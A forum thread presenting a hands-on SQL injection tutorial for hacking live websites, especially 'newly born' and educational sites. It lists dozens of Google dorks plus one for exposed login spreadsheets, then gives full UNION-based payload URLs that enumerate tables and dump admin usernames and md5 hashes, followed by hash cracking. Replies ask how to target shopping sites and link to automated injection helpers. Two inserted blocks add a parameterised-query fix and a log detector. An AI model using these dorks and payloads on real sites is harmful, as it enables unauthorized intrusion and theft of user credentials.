
Xeo Hacker

Until now we have seen a few terms related to hacking and some methods to hack passwords like phishing, keyloggers etc. Now we are moving a little forward. In this thread I'm going to post something about SQL INJECTION. It's a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites). OK buddies, let's start, and kindly pay attention; let your mind think and it's just child's play.

1) Search for a vulnerable site.
====================
Highlight one, then press Ctrl+C, then Ctrl+V in the Google search engine.

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=

And this one is just priceless:

login: * password= * filetype:xls

2) Definitions:
=========
inurl: -> is a search parameter in Google so that it searches for results in the site's URL.
.php?5= -> is what I'm searching for in a URL. SQL INJECTION works by adding code after the = symbol. This is also commonly referred to as a Dork.
Dork definition: It's the part of the site's URL that tells you that it can be vulnerable to a certain SQL injection.

Let's take this exploit for example. We will check its vulnerability by adding a magic quote (') at the end of the URL.

http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

3) So the URL will be like this:
===================
http://www.site.com/news_archive.php?id=5'

We hit enter and we get this result:

Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)

If you get an error, some text missing or a blank page, the site is vulnerable, but not always. Now we know that the site is vulnerable.

4) Find the columns:
=============
The next step is to find out how many columns the database contains. To find it we use "order by" (without the quotes) and this string "--" (no quotes). It will look like this:

http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)

We move a little higher (it doesn't matter):

http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)

until we get an error:

http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)

Now we got an error on this column; it will look like this:

Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')

This means the database contains only 14 columns.

5) Union select:
==========
Now use "-" (negative quote) and the union select statement. Using this we can select more data in one SQL statement.

It looks like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--

We hit enter. Numbers appear, like this: 6, 5, 8

6) Check MySQL version
================
Now we will check its MYSQL VERSION. We will add @@version on the numbers that appeared in the previous step. Lemme say I choose 8. We will replace 8 with @@version, so it will look like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--

And you will get a result like this:

6, 5, 5.1.32 <-- this is the version

7) Getting table names.
===============
We use group_concat(table_name). Replace @@version with group_concat(table_name) and it looks like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--

We're not done yet (don't hit enter): between number 14 and this "--" (quote) insert this:

+from+information_schema.tables+where+table_schema=database()

It will look like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--

We hit enter and got this result:

Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5

8) Column name:
============

Now we're done with TABLE NAME; we move on to COLUMN NAME. Use this string group_concat(column_name): replace group_concat(table_name) with group_concat(column_name). But before that we must choose one column. I choose auth_user_md5 because this is a must, or what we want. For a better result we need to hex auth_user_md5. Go to this link: http://home2.paulschou.net/tools/xlate/ and paste auth_user_md5 into the text box and click encode. Now we get the hex of auth_user_md5; it looks like this:

61 75 74 68 5f 75 73 65 72 5f 6d 64 35

Before proceeding remove the spaces between the numbers, like this:

617574685f757365725f6d6435

Now replace group_concat(table_name) with group_concat(column_name), like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--

Replace also +from+information_schema.tables+where+table_schema=database()-- with +from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- (the yellow letters and numbers are the auth_user_md5 hex we encoded).
Note: always add 0x before the hex, like above.

Here is the result:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--

Now hit enter and you get a result like this:

UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddress,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status

9) Main part:
=========
We use 0x3a to obtain what we want from the DATABASE, like pass, username, etc. Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3a,Status), but I prefer to do this one, group_concat(Username,0x3a,Password), for less effort. And replace also +from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--. 617574685f757365725f6d6435 is the hex value of auth_user_md5, so we replace it.

The result looks like this:

http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--

I hit enter and we got this:

admin username: k2admin / admin password in md5 hash: 21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d

10) Cracking the password:
=================
Because the password is an md5 hash we need to crack it.
http://passcracking.com/index.php
pass : x1R0zYB3bex

Enjoy. You can ask anything you like.
=================

Shalvendra Sukul

Man, that's a really sweet tutorial and you put a lot of effort in it, but it's really hard to come by sites which still have this vulnerability. Usually the input string is now validated and the characters which can be used to test for SQL injection, the backtick ( ' ) character, is escaped. The SQL error page is also replaced by a custom web page. I believe blind SQL injection is a better method if you are choosing to hack MySQL databases.

Nasruminallah Zeeshan

If I want to find specific sites like shopping sites using Dorks, how will I compose them?
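The errors in steps 3 and 4 of the tutorial come from a page that pastes the id parameter straight into the SQL string, and Shalvendra's reply points at input validation and escaping as the reason the trick rarely works any more. The following is an added example, not code from the tutorial or from any poster in the thread: it puts that string-concatenation pattern next to a parameterised version, in Python against an in-memory SQLite database that stands in for the MySQL tables named in the walkthrough (the NewsArticle and auth_user_md5 names and the md5 value are taken from the thread; the rows and the helper names are constructed for the demo). The id values from steps 3, 4 and 5 produce the syntax error, the ORDER BY range error and the UNION row leak against the concatenated query, and are refused before reaching the database by the bound-parameter version.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the tutorial's NewsArticle and
    auth_user_md5 tables (sample rows only; the hash is the md5 value quoted
    in the thread)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE NewsArticle (NewsID INTEGER, Title TEXT);
        INSERT INTO NewsArticle VALUES (6, 'Hello world');
        CREATE TABLE auth_user_md5 (Username TEXT, Password TEXT);
        INSERT INTO auth_user_md5 VALUES ('k2admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return conn


def vulnerable_lookup(conn, news_id):
    """The pattern behind the tutorial's 'Invalid SQL' errors: the id taken from
    the query string is concatenated into the statement text, so whatever the
    client sends is parsed by the database as SQL."""
    sql = "SELECT * FROM NewsArticle WHERE NewsID=" + news_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, news_id):
    """Hardened form: the value is type-checked and then bound as a parameter.
    The database never sees it as SQL text, so a quote, an ORDER BY or a UNION
    in the input is just a string that fails the integer check."""
    if not news_id.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT * FROM NewsArticle WHERE NewsID=?", (int(news_id),)
    ).fetchall()


def probe(conn, lookup, payload):
    """Run one id value through a lookup function and classify the outcome:
    ('rows', result), ('error', db message) or ('rejected', [])."""
    try:
        return ("rows", lookup(conn, payload))
    except ValueError:
        return ("rejected", [])
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The id values from steps 3, 4 and 5 of the tutorial, used here as test input.
PAYLOADS = [
    "6'",                                                      # step 3: quote probe
    "6 order by 2--",                                          # step 4: within the column count
    "6 order by 3--",                                          # step 4: one past the last column
    "-6 union select Username,Password from auth_user_md5--",  # steps 5 and 9: union read
]

if __name__ == "__main__":
    conn = build_db()
    for payload in PAYLOADS:
        print(f"{payload!r:60} concatenated={probe(conn, vulnerable_lookup, payload)[0]:8} "
              f"parameterised={probe(conn, safe_lookup, payload)[0]}")
```

The point of the two functions side by side is that the fix is not escaping the quote (the tutorial's ORDER BY and UNION payloads contain no quote at all) but keeping untrusted data out of the statement text entirely; the type check on top is what turns the whole class of payload into a plain input-validation failure that an application can log and count.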

Harith Fahmi

Maybe it's too hard for me... can't make it. :DD

Samyak Tejawat

Nice post, but you can use SQLi Helper to make this very, very simple.

Hackerz World

SQL vulnerable sites are still present... As I have said, usually educational sites are vulnerable... If I get any vulnerable ones I will post them here. It's really hard to hack shopping sites as they deal in online money... so they make their sites very secure...

Hackerz World

Some useful sites for SQL:
=================
There are some sites which will help in SQL INJECTION.

SQL VULNERABILITY FINDER: You can find whether the site is vulnerable to SQL INJECTION or not through this link.
Link: http://sql.wehostsite.com/

The kinda-called "part 2" of the SQL vuln finder script of mine: just enter the vulnerable site URL and it will return you the following:
* Order by
* Selection Id
* Version
* Database name
Link: http://orderby.wehostsite.com/

You can also check much more about SQL Injection here ====> http://hackwithstyle.blogspot.com/search/label/SQL%20Injection

Nasruminallah Zeeshan

It is nice. I want to find "specific topic related" sites through Dorks. For example: I want to find the sites containing about "watches", so how will I compose the Dork for it?
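Every step of the tutorial above leaves a distinctive request in the web server's access log: a trailing quote on a numeric id (step 3), order by N-- (step 4), union select (step 5), @@version (step 6) and information_schema.tables or .columns (steps 7 and 8). The following is an added example, not from the thread or any poster: a small Python scanner that reads constructed Common Log Format lines (documentation addresses, made-up timestamps, request targets shaped like the tutorial's URLs), URL-decodes each target, tags the stage it matches and escalates a source address that has walked through more than one stage, which is exactly the sequence the walkthrough describes. The signature names, the log lines and the escalation threshold are all assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample (Common Log Format). Addresses come from the
# documentation ranges; the request targets mirror the tutorial's steps 3-8.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /news_archive.php?id=6 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2010:13:55:40 +0000] "GET /news_archive.php?id=6' HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2010:13:55:52 +0000] "GET /news_archive.php?id=6%20order%20by%2015-- HTTP/1.1" 200 790
203.0.113.5 - - [10/Oct/2010:13:56:10 +0000] "GET /news_archive.php?id=-6%20union%20select%201,2,3,4,5,6,7,@@version,9,10,11,12,13,14-- HTTP/1.1" 200 4881
203.0.113.5 - - [10/Oct/2010:13:56:30 +0000] "GET /news_archive.php?id=-6+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4990
198.51.100.7 - - [10/Oct/2010:13:57:01 +0000] "GET /news_archive.php?id=7 HTTP/1.1" 200 5011
"""

# Minimal Common Log Format parser: client address, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# One signature per stage of the walkthrough, applied to the URL-decoded target.
SIGNATURES = [
    ("quote-probe",   re.compile(r"=-?\d+'(?:$|&|\s|--)")),                         # step 3: id=6'
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),                # step 4: order by 15--
    ("union-select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),          # step 5: union select
    ("version-probe", re.compile(r"@@version", re.I)),                              # step 6: @@version
    ("schema-enum",   re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),  # steps 7-8
]


def scan_log(text):
    """Return one finding per request whose decoded target matches at least one
    signature; each finding carries the source address and the stages matched."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed CLF line; skip rather than guess
        target = unquote_plus(m.group("target"))  # %20 and + both become spaces
        hits = [name for name, rx in SIGNATURES if rx.search(target)]
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": target, "signatures": hits})
    return findings


def escalate(findings, min_stages=2):
    """Source addresses that have hit at least min_stages distinct stages.
    A lone stray quote is often noise; the quote -> order by -> union
    progression the tutorial walks through is not."""
    stages = defaultdict(set)
    for f in findings:
        stages[f["ip"]].update(f["signatures"])
    return {ip for ip, seen in stages.items() if len(seen) >= min_stages}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ts"], ",".join(f["signatures"]), f["target"], sep="  ")
    print("escalate:", sorted(escalate(found)))
```

Decoding before matching matters: the third and fifth sample lines carry the same "union select" in two different encodings (%20 and +), and a signature applied to the raw target would miss one of them. The per-address stage count is deliberately simple; in practice it would be keyed on a time window as well, but the idea carries over to any log pipeline that can group requests by source.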
